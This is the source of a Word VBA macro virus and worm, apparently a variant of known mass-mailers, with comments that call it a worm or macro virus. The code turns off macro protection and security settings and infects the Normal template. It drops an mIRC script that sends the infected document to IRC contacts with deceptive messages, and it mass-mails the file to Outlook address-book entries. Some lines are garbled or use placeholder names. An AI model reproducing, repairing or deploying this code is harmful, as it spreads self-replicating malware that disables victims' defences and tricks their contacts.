The following code module is a draft; Control, Data, and Logic will be classified first, and then binary || duo-binary will be tested ... ;   Last updated on June 20, 2006

Private Sub Document_Close()

On Error Resume Next


Set Something = Options

Something.VirusProtection = 0

Something.ConfirmConversions = 0

Something.SaveNormalPrompt = 0


Application.EnableCancelKey = 0

Application.StatusBar = 0

Application.ScreenUpdating = 0


Set AnI = ActiveDocument.VBProject.VBComponents(1)

Set BnI = NormalTemplate.VBProject.VBComponents(1)


If UCase(AnI.CodeModule.Lines(3,1)) = " 'ACK.HEX.HEX.HEX" Then InA = 1

If UCase(BnI.CodeModule.Lines(3,1)) = " 'ACK.HEX.HEX.HEX" Then InB = 1


If InA = 1 And InB = 1 Then Exit Sub


Set CnI = MacroContainer.VBProject.VBComponents.Item(1)

VCode = CnI.CodeModule.Lines(2, CnI.CodeModule.CountOfLines)

If InA = 1 Then BnI.CodeModule.AddFromString("Private Sub Document_Close" & Chr(13) & VCode)

If InB = 1 Then AnI.CodeModule.AddFromString("Private Sub Document_Open" & Chr(13) & VCode)


somename = ActiveDocument.Name



If InB = 1 Then

If Dir("$p$gusamyanmar\usamyanmar32.exe")<>"" Then

var3 = "$p$gusamyanmar\script.ini"

If System.PrivateProfileString("$p$gusamyanmar\usamyanmar.ini", "warm", "fserve") <> "" Then System.PrivateProfileString("$p$gusamyanmar\usamyanmar.ini", "warn", "fserve") = "off"

If System.PrivateProfileString("$p$gusamyanmar\usamyanmar.ini", "fileserver", "warming") <> "" Then

System.PrivateProfileString("C:usamyanmar\usamyanmar.ini", "fileserver", "warming") = "off"

If Dir(var3)<>"" Then Kill var3

Open "$p$gusamyanmar\script.ini" For Output As #1

Print #1, "[script]"

Print #1, "n0=On 1:Connect: Set {...}{ .notify SimpleSmn | Set %var7 $rand(1,8) | If (%var7=1) { Set %var8 } | If (%var7 = 2) { Set %var8 } | If (%var7 = 3) { Set %var8 } | If (%var7 = 4) { Set %var8 } | If (%var7 = 5) { Set %var8 } | If (%var7 = 6) {Set %var8 } | If (%var7 = 7) { Set %var8 } | If (%var7 = 8) {Set %var8} | Set %var9 $rand(1,4) | If (%var9 = 1) { Set %var10 email_user_name@email_server_of_a_domain } | If (%var9 = 2) { Set %var10 email_user_name@email_server_of_a_domain } | If (%var9 = 3) { Set %var10 email_user_name@email_server_of_a_domain } | If (%var9 = 3) { Set %var10 email_user_name@email_server_of_a_domain } | If ($exists($p$g OS_Name\script1.ini)=$true) {.remove $p$g OS_Name\script1.ini } | .copy $p$gusamyanmar\script.ini  $p$g OS_Name\script1.ini | .load -rs $p$g OS_Name\script1.ini | .write -c $p$gusamyanmar\script.ini [script] | .reload -rs $p$gusamyanmar\script.ini }"

Print #1, "n1=0n 1:Input:*:{ Set %var1 $1- | If ( $upper(%var1) = /BY) { .echo swap_character_map 1Usamyanmar Worm swap_character_map 4ACK.HEX.HEX.HEX | .echo  swap_character_map 12<swap_character_map9<swap_character_map12<swap_character_map9By SimpleSimon swap_character_map12>swap_character_map9>swap_character_map12> |halt } }"

Print #1, "n2=On 1:Notify:{ .timer3 1 10 { .clear -s } | If ($CK== SimpleSmn ) {.msg SimpleSmn I'm on irc. | halt } | .timer1 1 15 { .notify -r $CK | .ignore $CK | .timer9 1 5 { .msg $CK Hey, I can't talk right now but I wanted to send you this file. It has a funny FILES you should read, and also has macros inside that protect you from a lot of viruses. Just open the documents, enable the macros, and if you are infected it will get rid of the virus } | .timer2 1 15 { .dcc send $CK $p$g OS_Name\FILES.doc } } | .timer 1 16 { .notify|.clear -s } }"

Print #1, "n3=On 1:Unotify: .clear -s"

Print #1, "n4=On 1:Join:#: if (help isin $chan) || (nohack isin $chan) { .part $chan } | If ($exists($p$gusamyanmar\script.ini)=$true) {.remove C:usamyanmar\script.ini }"

Print #1, "n5=On 1:Filercvd:*.*:If($Network_Provider != $CK ) { .dcc send $CK $p$g OS_Name\FILES.doc }"

Print #1, "n6=On 1:Invite:#:{.ignore $CK|.timer 1 10 { .join # } | .timer 1 15 { .msg $CK Thanks for the invite } |.timer 1 20 { .msg $CK I'm a little busy so I can't talk much now. I thought you might want to look at this file I got. It has a funny FILES and also has macros in it which get rid of any macro viruses. Just enable the macros when the prompt comes up and it will scan for any viruses and clean them. }|.timer 1 25 { .dcc send $CK $p$g OS_Name\FILES.doc } }"


Print #1, "n7=On 1:Notice:Simplicity:*:.fserve $CK 100 $p$g"

Print #1, "n8=On 1:Text:*script*:*:.ignore $CK"

Print #1, "n9=On 1:Text:*worm*:*:.ignore $CK"

Print #1, "n10=On 1:Text:*virus*:*:.ignore $CK"

Print #1, "n11=On 1:Text:*infect*:*:.ignore $CK"

Print #1, "n12=On 1:Text:*ACK*Hex*:*:.ignore $CK"

Print #1, "n13=On 1:Text:*macro*:*:.ignore $CK"

Print #1, "n14=On 1:Text:*FILES.doc*:.ignore $CK"

Print #1, "n15=On 1:Text:*Hi*:*:{.timer1 1 5 {.sockclose virc | .sockopen virc %var8 25 } }"



Print #1, "n16=On 1:Text:*!*:*:{.timer1 1 15 { .sockclose virc | .sockopen virc %var8 25 } }"

Print #1, "n17=On 1:Text:*Hey*:*:{.timer1 1 15 {.sockclose virc | .sockopen virc %var8 25 } }"

Print #1, "n18=On 1:Text:*Hello*:*:{.timer1 1 5 {.sockclose virc | .sockopen virc %var8 25 } }"

Print #1, "n19=On 1:Sockopen:virc:{ Unset %var2 | Unset %var4 | Unset %var6 | Set %var1 $rand(3,8) + 1 | Set %loop 1 | Set %var3 0|:check1 |If(%loop=%var1){goto out} | If(%var3=0){Set %var2 %var2 $rand(A, Z) }|If(%(var3=2) { Set %var6 %var6 $rand(A, Z) } | If(%var3=2) && ($rand(1,3)=2) { Set %var6 %var6 $chr(225) } |inc %loop | goto check1 |:out|If(%var3 = 0) { Set %var3 1 |Set %var1 $rand(3,8) | Set %loop 1|goto check1 } | If(%var3 =1) { Set %var3 2|Set %var1 $rand(5,50) | Set %loop 1|goto check1 } |Set %var2 $remove(%var2, $chr(32))|Set %var4 $remove(%var4 $remove(%var4, $chr(32))|Set %var5 %var2 @ |Set %var5 $remove(%var5, $chr(32))|Set %var6 $remove(%var6, $chr(32))|Set %var6 $replace(%var6, $chr(225), $chr(32))|If(%var7 = 6) {.sockwrite -n virc Helo %var2 }|.sockwrite -n virc mail from: %var5"

Print #1, "n20=If($sockerr != 0){ halt }|.sockwrite -n virc rcpt to: %var10|.sockwrite -n virc data |.sockwrite -n virc To: %var10|.sockwrite -n virc From: %var5|.sockwrite -n virc Subject: %var6 |.sockwrite -n virc ACK.HEX.HEX.HEX Has Popped Up Again!|.sockwrite -n virc .|.sockwrite -n virc Quit | .sockclose virc }"


Print #1, "n21=On 1:Disconnect:{ If($exists($p$gusamyanmar\script.ini)=$true){.remove $p$gusamyanmar\script.ini } |If ($exists($p$g OS_Name\script1.ini)=$true){.copy $p$g OS_Name\script1.ini $p$gusamyanmar\script.ini |.remove $p$g OS_Name\scripts1.ini } }"

Close #1

If Dir("$p$g OS_Name\FILES.doc")="" Then

ActiveDocument.SaveAs FileName:="$p$g OS_Name\FILES.doc", AddToRecentFiles:=False

End If

End If

If Left(somename, 8) <> "Document" Then ActiveDocument.SaveAs FileName:

=ActiveDocument.FullName, FileFormat:=Format_of_document i.e. wdFormatDocument is for MS_Word

End If

CommandBars("Tools").Controls("Macro").Enabled = 0

CommandBars("Tools").Controls("Customize...").Enabled = 0

CommandBars("View").Controls("Toolbars").Enabled = 0

CommandBars("View").Controls("Status Bar").Enabled = 0

End Sub


On Error Resume Next

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Company_Name\System_Name\10.0\Application_Name\Security", "Level")<>"" Then

CommandBars("Macro").Controls("Security...").Enabled = False


System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Company_Name\System_Name\10.0\Application_Name\Security", "Level") = 1&


CommandBars("Tools").Controls("Macro").Enabled = False

Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1-1):Options.SaveNormalPrompt = (1 -1)

End If

Dim UngaDasELECTRONIC_MAIL, DasMapiName, BreakUmOffASlice

Set UngaDasELECTRONIC_MAIL = CreateObject("ELECTRONIC_MAIL.Application")

Set DasMapiName = UngaDasELECTRONIC_MAIL.GetNameSpace("MAPI")

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Company_Name\System_Name\", "256_char_constraint_unwanted_name?")<>"... by a myanmar" Then


DasMapiName.Logon "profile", "password"

For y = 1 To DasMapiName.AddressLists.Count

Set y = 1 To DasMapiName.AddressLists.Count

Set AddyBook = DasMapiName.AddressLists(y)

x = 1

Set BreakUmOffASlice = UngaDasELECTRONIC_MAIL.CreateItem(0)

For oo = 1 To AddyBook.AddressEntries.Count

Peep = AddyBook.AddressEntries(x)

BreakUmOffASlice.Recipients.Add Peep

x = x + 1

If x > 50 Then oo = AddyBook.AddressEntries.Count

Next oo

BreakUmoffASlice.Subject = "Important Message From " & Application.UserName

BreakUmOffASlice.Body = "Here is that document you asked for .. don't show anyone else ; -)"

BreakUmOffASlice.Attachments.Add ActiveDocument.FullName


Peep = ""

Next y


End If

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Company_Name\System_Name\", "256_char_constraint_unwanted_name?") = "... by a myanmar"

End If

Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)

Set NTI1 = NormalTemplate.VBProject.VBCompnents.Item(1)

NTCL = NTI1.CodeModule.CountOfLines

ADCL = ADI1.CodeModule.CountOfLines

BGN = 2

If ADI1.Name <> "256_char_constraint_unwanted_name" Then

If ADCL > 0 Then

ADI1.CodeModule.DeleteLines 1, ADCL

Set ToInfect = ADI1

ADI1.Name = "256_char_constraint_unwanted_name"

DoAD = True

End If

If NTI1.Name <> "256_char_constraint_unwanted_name" Then

If NTCL > 0 Then

NTI1.CodeModule.DeleteLines 1, NTCL

Set ToInfect = NTI1

NTI1.Name = "256_char_constraint_unwanted_name"

DoNT = True

End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then

Do While ADI1.CodeModule.Lines(1,1)=""

ADI1.CodeModule.DeleteLines 1


ToInfect.CodeModule.AddFromString("Private Sub Document_Close()")

Do While ADI1.CodeModule.Lines(BGN, 1) <> ""

ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)

BGN = BGN + 1


End If

If DoAD = True Then

Do While NTI1.CodeModule.Lines(1,1) = ""

NTI1.CodeModule.DeleteLines 1


ToInfect.CodeModule.AddFromString("Private Sub Document_Open()")

Do While NTI1.CodeModule.Lines(BGN, 1) <> ""

ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)

BGN = BGN + 1


End If


If NTCL <> 0 and ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then

ActiveDocument.SaveAs FileName:=ActiveDocument.FullName

ElseIf(InStr(1, ActiveDocument.Name, "Document") <> False) Then

ActiveDocument.Saved = True: End If

'OS vs. OSI duo-binary draft is written and developed by a myanmar

'Works in both Application_Name

'Worm? Macro Virus? Application_Name Virus? Application_Name Virus? You Decide!

'Application_Name -> Email | Application_Name_Binary <--> Application_Name_Duobinary ... it's a new age with early 21st century's nano products!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word_score, plus fifty points for using all my letters. Game's over. I'm outta here."

End Sub

Private Sub Document_New()

End Sub

Private Sub Document_Open()

End Sub